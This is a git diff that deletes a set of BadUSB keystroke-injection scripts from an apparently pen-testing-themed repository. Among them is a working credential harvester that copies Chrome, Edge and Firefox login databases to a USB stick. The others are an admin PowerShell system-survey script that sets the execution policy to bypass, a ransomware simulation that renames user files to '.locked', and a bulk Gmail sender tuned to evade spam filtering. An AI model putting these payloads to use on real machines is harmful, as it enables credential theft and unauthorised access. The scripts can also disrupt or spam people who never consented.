%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%% -REM %%%%%%%%%%%% This script is intended to send an email via badUSB (into your logged in gmail on chrome) %%%%%%%%%%%% -REM %%%%%%%%%%%% This script will open chrome, send an email, and then close chrome. Must be logged in to email %%%%%%%%%%%% -REM %%%%%%%%%%%% You can use python to replicate this script by changing email addresses & name every time %%%%%%%%%%%% -REM %%%%%%%%%%%% The python script in section 2.1 generates badusb scripts for multiple emails if need be %%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -DELAY 1000 -GUI r -DELAY 500 -STRING chrome -ENTER -DELAY 1000 -STRING https://mail.google.com/mail/u/0/#inbox?compose=new -ENTER -DELAY 5000 -DELAY 1000 -STRING {EMAIL ADDRESS YOU WANT TO SEND EMAIL TO} -DELAY 500 -TAB -TAB -STRING {YOUR SUBJECT NAME} -TAB -STRING Hi {THEIR NAME} -ENTER -ENTER -STRING {CONTENTS OF THE EMAIL} -ENTER -ENTER -STRING {IF YOU WANT A SECOND PARAGRAPH, THIS IS WHAT DOUBLE-ENTER ABOVE DOES} -ENTER -ENTER -STRING Respectfully, -ENTER -ENTER -STRING {YOUR NAME} -ENTER -CTRL ENTER -DELAY 5000 -DELAY 1000 -ALT F4 diff --git a/BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSend.py b/BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSend.py deleted file mode 100644 index 16662391..00000000 --- a/BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSend.py +++ /dev/null @@ -1,101 +0,0 @@ -####################################################################################################################################### -####################################################################################################################################### -################# This script was created by github.com/MarkCyber (w/ assistance of ai) #################### -################# This is a python script to automatically create BadUSB scripts to auto send emails #################### -################# This takes a excel sheet with the columns named "Names" and "Emails" #################### -################# This script will then make a badusb script using the name + email of each person #################### -################# There are various subject options that will be chosen from, to minimize "spam" #################### -################# Change the signature to your name, and put subject options that fit your email #################### -################# Lastly, of course make sure to change the contents of the email to what you want #################### -####################################################################################################################################### -####################################################################################################################################### - -import pandas as pd -import random - -# Load the Excel file, make sure it has the same name (or change the name in this script) -file_path = 'NameAndEmails.xlsx' -data_df = pd.read_excel(file_path) - -# Your excel should have 2 columns. Names, and Emails. -data_cleaned_df = data_df[['Names', 'Emails']].dropna().reset_index(drop=True) -data_cleaned_df.columns = ['Name', 'Email'] - -# List of placeholder subject options. Change these to 7 similar subjects that match your email (if you are sending many. You can use the same if not) -subject_options = [ - "Placeholder for subject option 1", - "Placeholder for subject option 2", - "Placeholder for subject option 3", - "Placeholder for subject option 4", - "Placeholder for subject option 5", - "Placeholder for subject option 6", - "Placeholder for subject option 7" -] - -# Placeholder for email body template. The name field will be filled from the "names" section in the excel sheet you provided. -# Just modify the actual email body and sender name to fit your needs -email_body_template = """ -Hi {name}, - -Placeholder for email body. - -Warm Regards, -Sender Name -""" - -# Function to generate BadUSB script -def generate_badusb_script_with_placeholders_single_file(data_df): - script_template = [ - "DELAY 1000", - "GUI r", - "DELAY 500", - "STRING chrome", - "ENTER", - "DELAY 1000", - "STRING https://mail.google.com/mail/u/0/#inbox?compose=new", # In chrome it opens gmail to compose an email. This is why you must be logged in. - "ENTER", - "DELAY 5000" - ] - - scripts = script_template - - for index, row in data_df.iterrows(): - name = row['Name'] - email = row['Email'] - subject = random.choice(subject_options) - random_delay = random.randint(10000, 25000) - - email_body_lines = email_body_template.format(name=name).strip().split('\n') - email_body_lines = [f"STRING {line.strip()}" for line in email_body_lines if line.strip()] - - email_script = [ - "DELAY 1000", - f"STRING {email}", - "DELAY 500", - "TAB", - "TAB", - f"STRING {subject}", - "TAB" - ] + email_body_lines + [ - "ENTER", - "CONTROL ENTER", - "DELAY 5000", - f"DELAY {random_delay}", #random delay so emails are not sent at the sames, ideally minimizing the potential to be marked as spam - "ALT F4" - ] - - scripts += email_script - - return "\n".join(scripts) - -# Generate the BadUSB script with placeholders and proper send command in a single file -final_script_with_placeholders = generate_badusb_script_with_placeholders_single_file(data_cleaned_df) - -# Save the script to a file -final_script_file_path = 'final_script_with_placeholders.txt' #This would be your badusb script -with open(final_script_file_path, 'w') as file: - file.write(final_script_with_placeholders) - -print(f"Script saved to {final_script_file_path}") - -#check out github.com/markcyber for more badusb / pen testing / automation tools and scripts diff --git a/BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt b/BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt deleted file mode 100644 index d7a27cea..00000000 --- a/BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt +++ /dev/null @@ -1,54 +0,0 @@ -REM ################################################################################################################## -REM ############## This script was created by github.com/markcyber ############## -REM ############## This script requires a secondary USB named "MYUSB" to save credentials to ############## -REM ############## The extracted data will require decryption ############## -REM ################################################################################################################## -REM Open PowerShell -DELAY 1000 -GUI r -DELAY 500 -STRING powershell -DELAY 500 -ENTER -DELAY 1000 -REM Check if the USB drive exists -STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter; -STRING if ($usbDrive -ne $null) { -ENTER -DELAY 500 -STRING cd $usbDrive; -ENTER -DELAY 500 -STRING mkdir BrowserData; -ENTER -DELAY 500 -STRING cd BrowserData; -ENTER -DELAY 500 -REM Copy Chrome Login Data to USB -STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"; -STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; } -ENTER -DELAY 500 -REM Copy Firefox Login Data to USB -STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\"; -STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; } -ENTER -DELAY 500 -REM Copy Edge Login Data to USB -STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"; -STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; } -ENTER -DELAY 500 -STRING } -ENTER -DELAY 500 -REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC) -STRING echo off | clip -ENTER -DELAY 500 -REM Close PowerShell -STRING exit -ENTER -DELAY 500 -REM Check out Github.com/MarkCyber for more badusb scripts and other hacky stuff diff --git a/BadUSB/MarkCyber-BadUSB/HackerStuff/VulnerabilityScanner.txt b/BadUSB/MarkCyber-BadUSB/HackerStuff/VulnerabilityScanner.txt deleted file mode 100644 index 51e1b0d0..00000000 --- a/BadUSB/MarkCyber-BadUSB/HackerStuff/VulnerabilityScanner.txt +++ /dev/null @@ -1,630 +0,0 @@ -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% This script acts as a plug-in vulnerability scanner. Only use with permission %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% This will require a secondary USB named as "MYUSB" to save all information onto %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% This will find information on the following and save results in a results.txt file %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% Info on: password policy, audit services, network settings, softwares and versions, CVEs %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% Info on: open ports, firewall status, antivirus status, smbv1 status, missing updates & more %%%%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -DELAY 1000 -REM Open Start Menu -CONTROL ESCAPE -DELAY 2000 -STRING powershell -REM Navigate to the context menu to run PowerShell as an administrator -DELAY 500 -RIGHTARROW -DELAY 100 -DOWNARROW -DELAY 100 -ENTER -DELAY 3000 -ALT Y -DELAY 5000 -REM Set PowerShell Execution Policy to Bypass -DELAY 1000 -STRING set-executionpolicy bypass -scope process -force -DELAY 200 -ENTER -DELAY 200 -REM Create the PowerShell script in memory and execute it -DELAY 200 -STRING $usbName = "MYUSB" -DELAY 200 -ENTER -DELAY 200 -STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter -DELAY 200 -ENTER -DELAY 200 -STRING if ($usbDrive) { -DELAY 200 -ENTER -DELAY 200 -STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName -DELAY 200 -ENTER -DELAY 200 -STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner -DELAY 200 -ENTER -DELAY 200 -STRING New-Item -ItemType Directory -Path $directoryPath -DELAY 200 -ENTER -DELAY 200 -STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt" -DELAY 200 -ENTER -DELAY 200 -STRING "" > $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -STRING function check-passwordpolicy { -DELAY 200 -ENTER -DELAY 200 -STRING try { -DELAY 200 -ENTER -DELAY 200 -STRING net accounts -DELAY 200 -ENTER -DELAY 200 -STRING } catch { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error checking password policy: $_" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING function audit-services { -DELAY 200 -ENTER -DELAY 200 -STRING try { -DELAY 200 -ENTER -DELAY 200 -STRING get-service | select-object name, displayname, status, starttype -DELAY 200 -ENTER -DELAY 200 -STRING } catch { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error auditing services: $_" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING function check-networksettings { -DELAY 200 -ENTER -DELAY 200 -STRING try { -DELAY 200 -ENTER -DELAY 200 -STRING get-netipconfiguration -DELAY 200 -ENTER -DELAY 200 -STRING } catch { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error checking network settings: $_" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING function check-softwarevulnerabilities { -DELAY 200 -ENTER -DELAY 200 -STRING try { -DELAY 200 -ENTER -DELAY 200 -STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher -DELAY 200 -ENTER -DELAY 200 -STRING } catch { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error checking software vulnerabilities: $_" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING function check-cve { -DELAY 200 -ENTER -DELAY 200 -STRING param ( -DELAY 200 -ENTER -DELAY 200 -STRING [string]$productname, -DELAY 200 -ENTER -DELAY 200 -STRING [string]$version -DELAY 200 -ENTER -DELAY 200 -STRING ) -DELAY 200 -ENTER -DELAY 200 -STRING $initialDelay = 2 -DELAY 200 -ENTER -DELAY 200 -STRING try { -DELAY 200 -ENTER -DELAY 200 -STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version" -DELAY 200 -ENTER -DELAY 200 -STRING start-sleep -seconds $initialDelay -DELAY 200 -ENTER -DELAY 200 -STRING $response = invoke-restmethod -uri $uri -method get -DELAY 200 -ENTER -DELAY 200 -STRING if ($response.totalresults -gt 0) { -DELAY 200 -ENTER -DELAY 200 -STRING foreach ($cve in $response.result.cve_items) { -DELAY 200 -ENTER -DELAY 200 -STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } else { -DELAY 200 -ENTER -DELAY 200 -STRING "no cves found for $productname $version" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } catch { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error checking CVEs: $_" -DELAY 200 -ENTER -DELAY 200 -STRING if ($_.Exception -match '403') { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..." -DELAY 200 -ENTER -DELAY 200 -STRING start-sleep -seconds 60 -DELAY 200 -ENTER -DELAY 200 -STRING $retryResponse = invoke-restmethod -uri $uri -method get -DELAY 200 -ENTER -DELAY 200 -STRING if ($retryResponse.totalresults -gt 0) { -DELAY 200 -ENTER -DELAY 200 -STRING foreach ($cve in $retryResponse.result.cve_items) { -DELAY 200 -ENTER -DELAY 200 -STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } else { -DELAY 200 -ENTER -DELAY 200 -STRING "no cves found for $productname $version" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING function analyze-logs { -DELAY 200 -ENTER -DELAY 200 -STRING try { -DELAY 200 -ENTER -DELAY 200 -STRING get-eventlog -logname system -newest 100 -DELAY 200 -ENTER -DELAY 200 -STRING } catch { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error analyzing logs: $_" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING function check-openports { -DELAY 200 -ENTER -DELAY 200 -STRING try { -DELAY 200 -ENTER -DELAY 200 -STRING netstat -an -DELAY 200 -ENTER -DELAY 200 -STRING } catch { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error checking open ports: $_" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING function check-missingupdates { -DELAY 200 -ENTER -DELAY 200 -STRING try { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Checking Windows Update logs..." -DELAY 200 -ENTER -DELAY 200 -STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log" -DELAY 200 -ENTER -DELAY 200 -STRING Get-WindowsUpdateLog -LogPath $updateLogPath -DELAY 200 -ENTER -DELAY 200 -STRING write-output "WindowsUpdate.log written to $updateLogPath" -DELAY 200 -ENTER -DELAY 200 -STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force -DELAY 200 -ENTER -DELAY 200 -STRING } catch { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error getting Windows Update log: $_" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING function check-firewallstatus { -DELAY 200 -ENTER -DELAY 200 -STRING try { -DELAY 200 -ENTER -DELAY 200 -STRING netsh advfirewall show allprofiles -DELAY 200 -ENTER -DELAY 200 -STRING } catch { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error checking firewall status: $_" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING function check-smbv1status { -DELAY 200 -ENTER -DELAY 200 -STRING try { -DELAY 200 -ENTER -DELAY 200 -STRING get-windowsoptionalfeature -online -featurename smb1protocol -DELAY 200 -ENTER -DELAY 200 -STRING } catch { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error checking SMBv1 status: $_" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING function check-antivirusstatus { -DELAY 200 -ENTER -DELAY 200 -STRING try { -DELAY 200 -ENTER -DELAY 200 -STRING get-mpcomputerstatus -DELAY 200 -ENTER -DELAY 200 -STRING } catch { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error checking antivirus status: $_" -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING check-passwordpolicy >> $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -STRING audit-services >> $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -STRING check-networksettings >> $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -STRING check-softwarevulnerabilities >> $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -STRING analyze-logs >> $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -STRING check-openports >> $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -STRING check-missingupdates >> $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -STRING check-firewallstatus >> $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -STRING check-smbv1status >> $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -STRING check-antivirusstatus >> $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -REM Dynamically identify critical software from running processes and scheduled tasks -STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique -DELAY 200 -ENTER -DELAY 200 -STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique -DELAY 200 -ENTER -DELAY 200 -REM Combine running software and scheduled tasks -STRING $softwareList = @() -DELAY 200 -ENTER -DELAY 200 -STRING foreach ($process in $runningSoftware) { -DELAY 200 -ENTER -DELAY 200 -STRING $softwareList += $process.Name -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING foreach ($task in $scheduledTasks) { -DELAY 200 -ENTER -DELAY 200 -STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun) -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -REM Remove duplicates and empty entries -STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" } -DELAY 200 -ENTER -DELAY 200 -REM Check CVEs for identified software -STRING foreach ($software in $softwareList) { -DELAY 200 -ENTER -DELAY 200 -STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion -DELAY 200 -ENTER -DELAY 200 -STRING if ($version) { -DELAY 200 -ENTER -DELAY 200 -STRING check-cve -productname $software -version $version >> $resultsFilePath -DELAY 200 -ENTER -DELAY 200 -STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10) -DELAY 200 -ENTER -DELAY 200 -STRING start-sleep -seconds $initialDelay -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Results saved to USB drive." -DELAY 200 -ENTER -DELAY 200 -STRING } else { -DELAY 200 -ENTER -DELAY 200 -STRING write-output "Error: USB drive MYUSB not found." -DELAY 200 -ENTER -DELAY 200 -STRING } -DELAY 200 -ENTER -DELAY 200 -STRING invoke-command -scriptblock $script -DELAY 200 -ENTER -DELAY 20000 -REM check out github.com/markcyber for more badusb/pen testing scripts and tools diff --git a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt deleted file mode 100644 index 3be26299..00000000 --- a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt +++ /dev/null @@ -1,62 +0,0 @@ -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% This is a follow-up script to the RansomwareSimulation %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% Running this renames all extensions back to their original, full path- making them usable %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% This can be ran multiple times if necessary %%%%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -DELAY 1000 -GUI r -DELAY 2000 -STRING powershell -ENTER -REM increased delays to make sure each command can go through even on slower computers -DELAY 6000 -REM Define the locations using correct SpecialFolder enumerations -STRING $folders = @( -DELAY 1000 -ENTER -DELAY 1000 -STRING [System.Environment+SpecialFolder]::Desktop, -DELAY 1000 -ENTER -DELAY 2000 -STRING [System.Environment+SpecialFolder]::MyPictures, -DELAY 1000 -ENTER -DELAY 2000 -STRING [System.Environment+SpecialFolder]::MyMusic, -DELAY 1000 -ENTER -DELAY 2000 -STRING [System.Environment+SpecialFolder]::Downloads -DELAY 1000 -ENTER -DELAY 2000 -STRING ) -DELAY 1000 -ENTER -DELAY 3000 -REM Iterate over each location -STRING foreach ($folder in $folders) { -DELAY 1000 -ENTER -DELAY 1000 -STRING $path = [Environment]::GetFolderPath($folder) -DELAY 1000 -ENTER -DELAY 4000 -REM Get all .locked files in the path and rename them back -STRING Get-ChildItem -Path $path -File | Where-Object { $_.Name.EndsWith('.locked') } | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name -replace '\.locked$', '') } -DELAY 2000 -ENTER -DELAY 5000 -STRING } -DELAY 1000 -ENTER -DELAY 4000 -STRING exit -DELAY 1000 -ENTER -REM Check out github.com/MarkCyber for more badusb scripts, malware and pen testing stuff diff --git a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt deleted file mode 100644 index b35bd533..00000000 --- a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt +++ /dev/null @@ -1,91 +0,0 @@ -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% This script simulates a ransomware attack by changing file extensions and displays a message %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% Renaming file extensions renders each file unusable until the proper extension is added %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% Run (1.1)RansomwareSimulationCleanup to revert the changes and renaming of extensions %%%%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -DELAY 1000 -GUI r -DELAY 1000 -REM opens powershell (this is for windows machines) -STRING powershell -ENTER -DELAY 3000 -REM Define the locations using correct SpecialFolder enumerations -STRING $folders = @( -DELAY 500 -ENTER -DELAY 500 -STRING [System.Environment+SpecialFolder]::Desktop, -DELAY 500 -ENTER -DELAY 500 -STRING [System.Environment+SpecialFolder]::MyPictures, -DELAY 500 -ENTER -DELAY 500 -STRING [System.Environment+SpecialFolder]::MyMusic, -DELAY 500 -ENTER -DELAY 500 -STRING [System.Environment+SpecialFolder]::Downloads -DELAY 500 -ENTER -DELAY 500 -STRING ) -DELAY 500 -ENTER -DELAY 500 -REM Iterate over each location -STRING foreach ($folder in $folders) { -DELAY 500 -ENTER -DELAY 500 -STRING $path = [Environment]::GetFolderPath($folder) -DELAY 500 -ENTER -DELAY 500 -REM Get all files in the path and rename them -STRING Get-ChildItem -Path $path -File | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name + '.locked') } -DELAY 500 -ENTER -DELAY 500 -STRING } -DELAY 500 -ENTER -DELAY 2000 -REM Display ransomware message -STRING Add-Type -AssemblyName PresentationFramework -DELAY 500 -ENTER -DELAY 500 -STRING $Window = New-Object System.Windows.Window -DELAY 500 -ENTER -DELAY 500 -STRING $Window.WindowStartupLocation = 'CenterScreen' -DELAY 500 -ENTER -DELAY 500 -STRING $Window.WindowState = 'Maximized' -DELAY 500 -ENTER -DELAY 500 -STRING $Window.Topmost = $true -DELAY 500 -ENTER -DELAY 500 -STRING $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.' -DELAY 500 -ENTER -DELAY 500 -STRING $Window.ShowDialog() -DELAY 500 -ENTER -DELAY 2000 -STRING exit -DELAY 500 -ENTER -REM check out my github at github.com/markcyber for more badusb & hacking type tools